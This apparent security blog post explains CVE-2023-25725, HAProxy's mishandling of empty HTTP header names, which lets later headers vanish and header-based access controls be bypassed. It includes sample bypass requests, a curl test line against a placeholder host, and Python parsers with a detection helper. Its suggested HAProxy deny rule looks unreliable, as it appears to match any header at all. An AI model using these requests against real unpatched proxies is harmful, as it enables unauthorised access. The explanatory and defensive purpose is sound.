HAProxy is one of the world’s most popular load balancers and reverse proxies. However, even rock-solid software like HAProxy can have its flaws. This post digs deep into CVE-2023-25725 – a sneaky bug that lets crafty attackers bypass access controls by making some headers vanish, thanks to HAProxy’s trouble handling empty HTTP header field names. We'll explain the bug in plain language, show code snippets, walk through exploitation, and give advice for defense.

What Is CVE-2023-25725?

In short: HAProxy versions before 2.7.3 (and several earlier branches) could allow attackers to bypass access control by sending HTTP requests with specially crafted empty headers. This issue is also called “request smuggling” because it lets attackers sneak bad requests past security checks.

When HAProxy receives HTTP/1 requests with empty header names (for example, ": value\r\n"), it gets confused and drops some headers. This means security-sensitive headers like Authorization, Cookie, or X-Forwarded-For could be silently lost during processing. If your access control depends on these headers, users can easily sneak past.

Other affected branches and their fixed releases: 2.6.x before 2.6.9, 2.5.x before 2.5.12, 2.4.x before 2.4.22, 2.2.x before 2.2.29, and 2.0.x before 2.0.31.

- Only HTTP/1.0 and HTTP/1.1 traffic is affected by this bug. HTTP/2 and HTTP/3 are not at major risk, though they also drop such headers (with less impact).

HAProxy processes HTTP headers in a parser. Normally, a request header looks like this:

Header-Name: value\r\n

But someone can send a header like this:

: value\r\n

There's nothing before the colon! HAProxy is supposed to reject empty header names. Due to this bug, it sometimes accepts them, then gets out of sync with how it counts or stores headers.

When this happens, HAProxy may truncate the rest of the header list. It acts like the empty header is the last header, so anything after it is ignored – as if it was never sent.

If your firewall or access control checks are looking for headers that can disappear, an attacker can send a request like this to bypass your controls.

Sample Exploit Request

GET /protected HTTP/1.1
Host: example.com
Authorization: Bearer SECRET-TOKEN
: this header has no name!
Cookie: sessionid=abc123
X-Forwarded-For: 1.2.3.4

When HAProxy gets this, it may only see the headers up to the empty one, so Cookie and X-Forwarded-For never reach the backend server, and any access logic relying on them fails.
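To make the mechanism concrete, here is an added example (not HAProxy code) with two toy HTTP/1 header parsers run over the sample request above: one that models the truncation the bug causes, and one that rejects empty field names as RFC 9112 requires, plus a small check a defender can run over raw requests in logs. The request bytes and function names are constructed for this illustration.

```python
"""Toy parsers modelling CVE-2023-25725 (added example, not HAProxy's code)."""
import re

# RFC 9112: field-name = token, i.e. one or more tchar characters; "" is invalid.
TCHAR = re.compile(r"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")

# Constructed sample: the exploit request shown above, as raw bytes.
SAMPLE_REQUEST = (
    b"GET /protected HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"Authorization: Bearer SECRET-TOKEN\r\n"
    b": this header has no name!\r\n"
    b"Cookie: sessionid=abc123\r\n"
    b"X-Forwarded-For: 1.2.3.4\r\n"
    b"\r\n"
)

def _split_fields(raw: bytes):
    """Yield (name, value) per header line, skipping the request line."""
    head = raw.partition(b"\r\n\r\n")[0]
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        yield name.strip().decode("latin-1"), value.strip().decode("latin-1")

def parse_truncating(raw: bytes) -> dict:
    """Buggy behaviour: an empty name is treated as the end of the header list."""
    headers = {}
    for name, value in _split_fields(raw):
        if name == "":
            break  # everything after this point silently disappears
        headers[name.lower()] = value
    return headers

def parse_strict(raw: bytes) -> dict:
    """Hardened behaviour: a non-token field name rejects the whole request."""
    headers = {}
    for name, value in _split_fields(raw):
        if not TCHAR.match(name):
            raise ValueError(f"invalid header field name: {name!r}")
        headers[name.lower()] = value
    return headers

def strict_accepts(raw: bytes) -> bool:
    """True if the strict parser would accept the request (HTTP 400 otherwise)."""
    try:
        parse_strict(raw)
        return True
    except ValueError:
        return False

def has_empty_field_name(raw: bytes) -> bool:
    """Detection helper for logs or a WAF: any header line whose name is empty."""
    head = raw.partition(b"\r\n\r\n")[0]
    return any(l.partition(b":")[0].strip() == b"" for l in head.split(b"\r\n")[1:])
```

Run `parse_truncating(SAMPLE_REQUEST)` and note that only host and authorization survive, while `strict_accepts(SAMPLE_REQUEST)` is False.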

Exploit Details

Let’s see how an attacker could use this bug to bypass controls.

Find a control mechanism that uses headers

Many sites restrict access based on headers (e.g., a Cookie, Authorization, or X-Forwarded-For).

```http
GET /private HTTP/1.1
Authorization: Bearer secret
:
```

At the Code Level

The vulnerable code didn’t correctly reject headers like ": ...", so the htx_add_header() function (in HAProxy’s code) would get stuck, drop a header, or process wrong boundaries.

For automated testing, you could use curl with a crafted header:

curl -v -H 'Authorization: Bearer secret' -H ': malicious' -H 'Cookie: attacker=yes' http://target

Inspect your backend logs: did the Cookie reach your application? If not, you’re affected!

Real-World Risks

* Bypassing authentication (if Authorization or Cookie headers are dropped)
* Evading WAF and rate limiting (if dropped headers hide true IPs or tokens)
* Session hijacking and other “confused deputy” situations

Note: HTTP/2 and HTTP/3 drop these headers before parsing, so the attacker can't get the same result.


How Do I Fix or Defend Against This?

Upgrade!

Move to the fixed release for your branch: 2.7.3, 2.6.9, 2.5.12, 2.4.22, 2.2.29, or 2.0.31.

If you run any earlier version, you're vulnerable.

Bonus defense:
If you can't upgrade right away, add an HAProxy rule such as http-request deny if { hdr_reg("^") -m found } to block requests carrying empty header names. Verify in a test environment that the rule actually fires on a request like the sample above, because the vulnerable parser may already have truncated the header list before your ACLs are evaluated.

The Bottom Line

CVE-2023-25725 is a good reminder that subtle protocol parsing bugs can cause serious security risks. Attackers love when software “loses” security headers — keep your proxies up to date, and be careful about trusting HTTP input!

If you use HAProxy for access control or traffic filtering, patch now. Test with intentionally bad headers – don't assume your proxy is always behaving!

Stay safe, upgrade your stack, and follow official HAProxy security announcements for the latest news.

Timeline

Published on: 02/14/2023 19:15:00 UTC
Last modified on: 02/25/2023 06:15:00 UTC